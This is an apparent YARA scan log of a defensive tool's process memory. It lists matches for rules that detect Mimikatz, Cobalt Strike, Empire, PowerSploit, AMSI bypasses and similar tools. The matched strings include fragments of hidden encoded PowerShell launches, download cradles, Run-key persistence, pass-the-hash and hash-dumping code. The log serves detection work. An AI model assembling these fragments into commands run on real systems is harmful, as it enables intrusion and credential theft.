- 0x2cdace:$s9: ::FromBase64String('RABvAG4AZQAhAA==')))
- 0x3358a8:$s9: ::FromBase64String('RABvAG4AZQAhAA==')))
- 0x2cdb03:$s10: Write-Verbose "PowerShell ProcessID: $PID"
- 0x2cdb3a:$s11: [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Inveigh_BruteForce_2 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x2cdd89:$s1: }.NTLMv2_file_queue[0]|Out-File ${
- 0x335aa2:$s1: }.NTLMv2_file_queue[0]|Out-File ${
- 0x2cddb8:$s2: }.NTLMv2_file_queue.RemoveRange(0,1)
- 0x335ac7:$s2: }.NTLMv2_file_queue.RemoveRange(0,1)
- 0x2cdde9:$s3: }.NTLMv2_file_queue.Count -gt 0)
- 0x335aee:$s3: }.NTLMv2_file_queue.Count -gt 0)
- 0x2cde16:$s4: }.relay_running = $false
- 0x335b11:$s4: }.relay_running = $false
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_PowerUp_2 | Auto-generated rule - from files PowerUp.ps1 | Florian Roth | - 0x2cdff9:$s1: if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::
- 0x335c45:$s1: if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::
- 0x2ce04c:$s2: FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {
- 0x335c8e:$s2: FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {
- 0x2ce08e:$s3: $Null = Invoke-ServiceStart
- 0x335cc6:$s3: $Null = Invoke-ServiceStart
- 0x2ce0b6:$s4: Write-Warning "[!] Access to service $
- 0x335ce4:$s4: Write-Warning "[!] Access to service $
- 0x2ce0e9:$s5: } = $MyConString.Split("=")[1].Split(";")[0]
- 0x335d0d:$s5: } = $MyConString.Split("=")[1].Split(";")[0]
- 0x2ce122:$s6: } += "net localgroup ${
- 0x335d3c:$s6: } += "net localgroup ${
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Persistence_2 | Auto-generated rule - from files Persistence.ps1 | Florian Roth | - 0x2cd4da:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2ce30c:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x3353e4:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x335e77:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2ce361:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')
- 0x335ec2:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')
- 0x2ce3b2:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')
- 0x335f09:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')
- 0x2ce3fb:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- 0x335f48:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- 0x2ce453:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))
- 0x335f96:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))
- 0x2ce4ae:$s6: [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
- 0x2ce507:$s7: FromBase64String('TQBlAHQAaABvAGQA')
- 0x336036:$s7: FromBase64String('TQBlAHQAaABvAGQA')
- 0x2ce538:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=')
- 0x33605d:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=')
- 0x2ce56d:$s9: [Runtime.InteropServices.CallingConvention]::Winapi,
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Inveigh_BruteForce_3 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x2ce782:$s1: ::FromBase64String('TgBUAEwATQA=')
- 0x3361ee:$s1: ::FromBase64String('TgBUAEwATQA=')
- 0x2ce7b1:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))
- 0x336213:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))
- 0x2ce7f6:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))
- 0x33624e:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))
- 0x2ce83f:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))
- 0x33628d:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))
- 0x2ce88c:$s5: [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
- 0x2ce8e2:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA
- 0x33631c:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA
- 0x2ce92d:$s7: }.bruteforce_running)
- 0x33635d:$s7: }.bruteforce_running)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Suspicious_PowerShell_Code_1 | Detects suspicious PowerShell code | Florian Roth | - 0x2ca61d:$s4: powershell.exe -w hidden -ep bypass -Enc
- 0x333204:$s4: powershell.exe -w hidden -ep bypass -Enc
- 0x2ca652:$s5: -w hidden -noni -nop -c "iex(New-Object
- 0x33322f:$s5: -w hidden -noni -nop -c "iex(New-Object
- 0x2ca686:$s6: powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run
- 0x333259:$s6: powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth | - 0x2cba2b:$: ::FromBase64String("H4s
- 0x2cbc5a:$: ::FromBase64String("H4s
- 0x334045:$: ::FromBase64String("H4s
- 0x3341c0:$: ::FromBase64String("H4s
- 0x2cba4f:$: ::FromBase64String("TVq
- 0x33405d:$: ::FromBase64String("TVq
- 0x2cba73:$: ::FromBase64String("UEs
- 0x334075:$: ::FromBase64String("UEs
- 0x2cba97:$: ::FromBase64String("JAB
- 0x33408d:$: ::FromBase64String("JAB
- 0x2cbabb:$: ::FromBase64String("SUVY
- 0x3340a5:$: ::FromBase64String("SUVY
- 0x2cbae0:$: ::FromBase64String("SQBFAF
- 0x3340be:$: ::FromBase64String("SQBFAF
- 0x2cbb07:$: ::FromBase64String("SQBuAH
- 0x3340d9:$: ::FromBase64String("SQBuAH
- 0x2cbb2e:$: ::FromBase64String("PAA
- 0x3340f4:$: ::FromBase64String("PAA
- 0x2cbb52:$: ::FromBase64String("cwBhA
- 0x33410c:$: ::FromBase64String("cwBhA
- 0x2cbb78:$: ::FromBase64String("aWV4
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x2b1c74:$s1: <hta:application windowstate="minimize"/>
- 0x2b1e87:$s1: <hta:application windowstate="minimize"/>
- 0x2b5c16:$s1: <hta:application windowstate="minimize"/>
- 0x2b5d70:$s1: <hta:application windowstate="minimize"/>
- 0x2b1caa:$s2: <script>var b=new ActiveXObject("WScript.Shell");
- 0x2b5c42:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HTA_Embedded | Detects an embedded HTA file | Florian Roth | - 0x2b1c74:$s1: <hta:application windowstate="minimize"/>
- 0x2b1e87:$s1: <hta:application windowstate="minimize"/>
- 0x2b5c16:$s1: <hta:application windowstate="minimize"/>
- 0x2b5d70:$s1: <hta:application windowstate="minimize"/>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DeepPanda_htran_exe | Hack Deep Panda - htran-exe | Florian Roth | - 0x15d3de:$s3: [SERVER]connection to %s:%d error
- 0x15d40c:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort>
- 0x15d517:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
- 0x15d594:$s20: -listen <ConnectPort> <TransmitPort>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | CN_Toolset_NTscan_PipeCmd | Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe | Florian Roth | - 0x15b41d:$s2: Please Use NTCmd.exe Run This Program.
- 0x15b46b:$s4: \\.\pipe\%s%s%d
- 0x15b450:$s5: %s\pipe\%s%s%d
- 0x15b487:$s6: %s\ADMIN$\System32\%s%s
- 0x15b487:$s7: %s\ADMIN$\System32\%s
- 0x15b3ea:$s9: PipeCmdSrv.exe
- 0x16c0c6:$s9: PipeCmdSrv.exe
- 0x15b4ab:$s10: This is a service executable! Couldn't start directly.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x15b46b:$: \\.\pipe\%s%s%d
- 0x16c11f:$: \\.\pipe\%s%s%d
- 0x15b489:$: \ADMIN$\System32\%s%s
- 0x16c133:$: \ADMIN$\System32\%s%s
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0x2bd6e6:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
- 0x2c0e8f:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0x2bd8ac:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0x2c0fc0:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0x2bd8df:$x2: script:https://www.dropbox.com
- 0x2c0fe9:$x2: script:https://www.dropbox.com
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0x2bda6d:$s1: mshtml,RunHTMLApplication
- 0x2c10e2:$s1: mshtml,RunHTMLApplication
- 0x2bda93:$s2: new ActiveXObject("WScript.Shell").Run(
- 0x2c10fe:$s2: new ActiveXObject("WScript.Shell").Run(
- 0x2bdac7:$s3: /c start mshta j
- 0x2c1128:$s3: /c start mshta j
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0x2bdc55:$s1: w = new ActiveXObject(
- 0x2c1221:$s1: w = new ActiveXObject(
- 0x2bdc78:$s2: w.Run(r);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mimikatz_Memory_Rule_1 | Detects password dumper mimikatz in memory (False Positives: a service that could have copied a Mimikatz executable, AV signatures) | Florian Roth | - 0x2c824d:$s11: sekurlsa::pth
- 0x33188b:$s11: sekurlsa::pth
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | power_pe_injection | PowerShell with PE Reflective Injection | Benjamin DELPY (gentilkiwi) | - 0x113e83:$str_loadlib: 0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9
- 0x1147c8:$str_loadlib: 0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HKTL_PowerSploit | Detects default strings used by PowerSploit to establish persistence | Markus Neis | - 0xeb1e:$ps: function
- 0x212b5:$ps: function
- 0x21525:$ps: function
- 0x2302a:$ps: Function
- 0x23105:$ps: Function
- 0x3d778:$ps: function
- 0x3d796:$ps: function
- 0x3e5dd:$ps: function
- 0x3ee3d:$ps: function
- 0x427fb:$ps: function
- 0x58982:$ps: function
- 0x589f3:$ps: function
- 0x58f82:$ps: function
- 0x58fcc:$ps: function
- 0x732a3:$ps: function
- 0x73f3d:$ps: function
- 0x78b59:$ps: function
- 0x78f05:$ps: function
- 0x79ef8:$ps: Function
- 0x7a4fc:$ps: Function
- 0x7af64:$ps: function
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | apt_equation_equationlaser_runtimeclasses | Rule to detect the EquationLaser malware | unknown | - 0x14d8a5:$a1: ?a73957838_2@@YAXXZ
- 0x14db73:$a1: ?a73957838_2@@YAXXZ
- 0x14d8c5:$a2: ?a84884@@YAXXZ
- 0x14db89:$a2: ?a84884@@YAXXZ
- 0x14d8e0:$a3: ?b823838_9839@@YAXXZ
- 0x14db9a:$a3: ?b823838_9839@@YAXXZ
- 0x14d901:$a4: ?e747383_94@@YAXXZ
- 0x14dbb1:$a4: ?e747383_94@@YAXXZ
- 0x14d920:$a5: ?e83834@@YAXXZ
- 0x14dbc6:$a5: ?e83834@@YAXXZ
- 0x14d93b:$a6: ?e929348_827@@YAXXZ
- 0x14dbd7:$a6: ?e929348_827@@YAXXZ
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EquationDrug_HDDSSD_Op | EquationDrug - HDD/SSD firmware operation - nls_933w.dll | Florian Roth @4nc4p | - 0x14f02b:$s0: nls_933w.dll
- 0x14fbea:$s0: nls_933w.dll
- 0x14fcfa:$s0: nls_933w.dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0x2c4464:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x32eb16:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x2c4493:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x32eb3b:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x2c44de:$s3: MimiPenguin Results:
- 0x32eb7c:$s3: MimiPenguin Results:
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | CobaltStrike_Unmodifed_Beacon | Detects unmodified CobaltStrike beacon DLL | yara@s3c.za.net | - 0x2a26ee:$loader_export: ReflectiveLoader
- 0x2a2abc:$loader_export: ReflectiveLoader
- 0x2b9c46:$loader_export: ReflectiveLoader
- 0x2b9d4d:$loader_export: ReflectiveLoader
- 0x2b9d8b:$loader_export: ReflectiveLoader
- 0x2baedf:$loader_export: ReflectiveLoader
- 0x2baf9b:$loader_export: ReflectiveLoader
- 0x2bafc5:$loader_export: ReflectiveLoader
- 0x2bafed:$loader_export: ReflectiveLoader
- 0x2bb01e:$loader_export: ReflectiveLoader
- 0x2bb046:$loader_export: ReflectiveLoader
- 0x2bb07a:$loader_export: ReflectiveLoader
- 0x2bb0a4:$loader_export: ReflectiveLoader
- 0x2bb2c3:$loader_export: ReflectiveLoader
- 0x2bb342:$loader_export: ReflectiveLoader
- 0x2bb4a2:$loader_export: ReflectiveLoader
- 0x2bb4ff:$loader_export: ReflectiveLoader
- 0x2bba75:$loader_export: ReflectiveLoader
- 0x2bbb0f:$loader_export: ReflectiveLoader
- 0x2bbec1:$loader_export: ReflectiveLoader
- 0x2bbf2f:$loader_export: ReflectiveLoader
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Metasploit_Loader_RSMudge | Detects a Metasploit Loader by RSMudge - file loader.exe | Florian Roth | - 0x2bebd3:$s1: Could not resolve target
- 0x2bebf8:$s2: Could not connect to target
- 0x2bec20:$s3: %s [host] [port]
- 0x2bec3d:$s4: ws2_32.dll is out of date.
- 0x2bec64:$s5: read a strange or incomplete length value
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x2a4a32:$s1: \umeterpreter\u >
- 0x2a4a50:$s3: ^meterpreter >
- 0x2a4a6b:$s11: \umsf\u>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x2a4ecc:$x1: resources/covertvpn-injector.exe
- 0x2a4ef9:$s10: resources/browserpivot.x64.dll
- 0x2a4f24:$s17: resources/msfrpcd_new.bat
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x2b575d:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0x2b826e:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0x2b57dc:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | NTLM_Dump_Output | NTLM Hash Dump output file - John/LC format | Florian Roth | - 0x2d432d:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE:
- 0x339e97:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE:
- 0x2d435f:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
- 0x339ebf:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_WMIExec_Gen_1 | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x2b8ae2:$x1: Invoke-WMIExec
- 0x2ba1c4:$x1: Invoke-WMIExec
- 0x2b8afe:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))
- 0x2b8b76:$s1: Import-Module $PWD\Invoke-TheHash.ps1
- 0x2b8ba8:$s2: Import-Module $PWD\Invoke-SMBClient.ps1
- 0x2b8bdc:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList
- 0x2b8c38:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
- 0x2ba2e8:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_SMBExec_Invoke_WMIExec_1 | Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x2b8ef2:$s1: $process_ID = $process_ID -replace "-00-00",""
- 0x2b8f2d:$s2: Write-Output "$Target did not respond"
- 0x2b8f60:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_WMIExec_Gen | Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x2b928d:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
- 0x2b92da:$s2: $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- 0x2b934d:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PowerShdll | Detects hack tool PowerShdll | Florian Roth | - 0x2c6d1a:$x2: \PowerShdll.dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WMImplant | Auto-generated rule - file WMImplant.ps1 | Florian Roth | - 0x2d3d7d:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential
- 0x2d3db9:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x339b11:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x2d3e0f:$x3: WMImplant -Creds
- 0x2d3e2c:$x4: -Download -RemoteFile C:\passwords.txt
- 0x339b70:$x4: -Download -RemoteFile C:\passwords.txt
- 0x2d3e5f:$x5: -Command 'powershell.exe -command "Enable-PSRemoting
- 0x2d3ea0:$x6: Invoke-WMImplant
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | merlinAgent | Detects Merlin agent | Hilko Bengen | - 0x2be7bd:$x1: Command output:\x0D\x0A\x0D\x0A%s
- 0x2c1994:$x1: Command output:\x0D\x0A\x0D\x0A%s
- 0x2be7df:$x2: [-]Connecting to web server at %s to update agent configuration information.
- 0x2c19ac:$x2: [-]Connecting to web server at %s to update agent configuration information.
- 0x2be838:$x3: [-]%d out of %d total failed checkins
- 0x2c19fb:$x3: [-]%d out of %d total failed checkins
- 0x2be86a:$x4: [!}Unknown AgentControl message type received %s
- 0x2c1a23:$x4: [!}Unknown AgentControl message type received %s
- 0x2be8a7:$x5: [-]Received Agent Kill Message
- 0x2c1a56:$x5: [-]Received Agent Kill Message
- 0x2be8d2:$x6: [-]Received Server OK, doing nothing
- 0x2c1a77:$x6: [-]Received Server OK, doing nothing
- 0x2be903:$x7: [!]There was an error with the HTTP client while performing a POST:
- 0x2c1a9e:$x7: [!]There was an error with the HTTP client while performing a POST:
- 0x2be953:$x8: [-]Sleeping for %s at %s
- 0x2c1ae4:$x8: [-]Sleeping for %s at %s
- 0x2be978:$s1: Executing command %s %s %s
- 0x2c1aff:$s1: Executing command %s %s %s
- 0x2be99f:$s2: [+]Host Information:
- 0x2c1b1c:$s2: [+]Host Information:
- 0x2be9c0:$s3: \x09Hostname: %s
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_OSiRis | Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 | Florian Roth | - 0x2cf0e3:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target
- 0x2cef9f:$x2: Invoke-OSiRis
- 0x2cf15e:$x2: Invoke-OSiRis
- 0x3367b4:$x2: Invoke-OSiRis
- 0x3368ee:$x2: Invoke-OSiRis
- 0x2cf178:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}
- 0x2cf1c6:$x4: Device Guard Bypass Command Execution
- 0x2cf1f8:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath
- 0x2cf0e3:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
- 0x2cf240:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth | - 0x2d059c:$: VFZwVEFRR
- 0x3376b5:$: VFZwVEFRR
- 0x2d05b2:$: RWcFRBUU
- 0x3376bf:$: RWcFRBUU
- 0x2d05c7:$: UVnBUQVFF
- 0x3376c8:$: UVnBUQVFF
- 0x2d05dd:$: VFZvQUFBQ
- 0x3376d2:$: VFZvQUFBQ
- 0x2d05f3:$: RWb0FBQU
- 0x3376dc:$: RWb0FBQU
- 0x2d0608:$: UVm9BQUFB
- 0x3376e5:$: UVm9BQUFB
- 0x2d061e:$: VFZxQUFBR
- 0x3376ef:$: VFZxQUFBR
- 0x2d0634:$: RWcUFBQU
- 0x3376f9:$: RWcUFBQU
- 0x2d0649:$: UVnFBQUFF
- 0x337702:$: UVnFBQUFF
- 0x2d065f:$: VFZwUUFBS
- 0x33770c:$: VFZwUUFBS
- 0x2d0675:$: RWcFFBQU
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Reversed_Base64_Encoded_EXE | Detects a base64 encoded executable with reversed characters | Florian Roth | - 0x2d0858:$s1: AEAAAAEQATpVT
- 0x33783c:$s1: AEAAAAEQATpVT
- 0x2d0872:$s2: AAAAAAAAAAoVT
- 0x33784c:$s2: AAAAAAAAAAoVT
- 0x2d088c:$s3: AEAAAAEAAAqVT
- 0x33785c:$s3: AEAAAAEAAAqVT
- 0x2d08a6:$s4: AEAAAAIAAQpVT
- 0x33786c:$s4: AEAAAAIAAQpVT
- 0x2d08c0:$s5: AEAAAAMAAQqVT
- 0x33787c:$s5: AEAAAAMAAQqVT
- 0x2d08da:$sh1: SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU
- 0x33788d:$sh1: SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU
- 0x2d091a:$sh2: LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR
- 0x3378c4:$sh2: LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR
- 0x2d095a:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
- 0x3378fb:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Script_Base64_Blocks_Jun20_1 | Detects suspicious file with base64 encoded payload in blocks | Florian Roth | - 0x2d0ad9:$sa1: <script language=
- 0x3132a1:$sa1: <script language=
- 0x320c9a:$sa1: <script language=
- 0x337a00:$sa1: <script language=
- 0x366850:$sa1: <script language=
- 0x36fd86:$sa1: <script language=
- 0x2d0af7:$sb2: 41 41 41 22 2B 0D 0A 22 41 41 41
- 0x337a15:$sb2: 41 41 41 22 2B 0D 0A 22 41 41 41
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Reversed_Hacktool_Author | Detects a suspicious path traversal into a Windows folder | Florian Roth | - 0x2d0c6c:$x1: iwiklitneg
- 0x2d0c83:$x2: eetbus@
- 0x337b24:$x2: eetbus@
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Base64_Encoded_Hacktool_Dev | Detects a suspicious base64 encoded keyword | Florian Roth | - 0x2d0dc5:$: QGdlbnRpbGtpd2
- 0x337be9:$: QGdlbnRpbGtpd2
- 0x2d0de0:$: BnZW50aWxraXdp
- 0x337bf8:$: BnZW50aWxraXdp
- 0x2d0dfb:$: AZ2VudGlsa2l3a
- 0x337c07:$: AZ2VudGlsa2l3a
- 0x2d0e16:$: QGhhcm1qMH
- 0x337c16:$: QGhhcm1qMH
- 0x2d0e2d:$: BoYXJtajB5
- 0x337c21:$: BoYXJtajB5
- 0x2d0e44:$: AaGFybWowe
- 0x337c2c:$: AaGFybWowe
- 0x2d0e5b:$: IEBzdWJ0ZW
- 0x337c37:$: IEBzdWJ0ZW
- 0x2d0e72:$: BAc3VidGVl
- 0x337c42:$: BAc3VidGVl
- 0x2d0e89:$: gQHN1YnRlZ
- 0x337c4d:$: gQHN1YnRlZ
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_MetasploitPayload | Detects Empire component - file Invoke-MetasploitPayload.ps1 | Florian Roth | - 0x2a7879:$s1: $ProcessInfo.Arguments="-nop -c $DownloadCradle"
- 0x2a78b6:$s2: $PowershellExe=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Exploit_Jenkins | Detects Empire component - file Exploit-Jenkins.ps1 | Florian Roth | - 0x2a7ac7:$s1: $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"
- 0x2ad7a6:$s1: $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"
- 0x2a7b11:$s2: $url = "http://"+$($Rhost)+":"+$($Port)+"/script"
- 0x2a7b4f:$s3: $Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Get_SecurityPackages | Detects Empire component - file Get-SecurityPackages.ps1 | Florian Roth | - 0x2a7d4e:$s1: $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)
- 0x2a7d8e:$s2: $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_PowerDump | Detects Empire component - file Invoke-PowerDump.ps1 | Florian Roth | - 0x2a7fa4:$x16: $enc = Get-PostHashdumpScript
- 0x2a7fce:$x19: $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
- 0x2a8020:$x20: $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
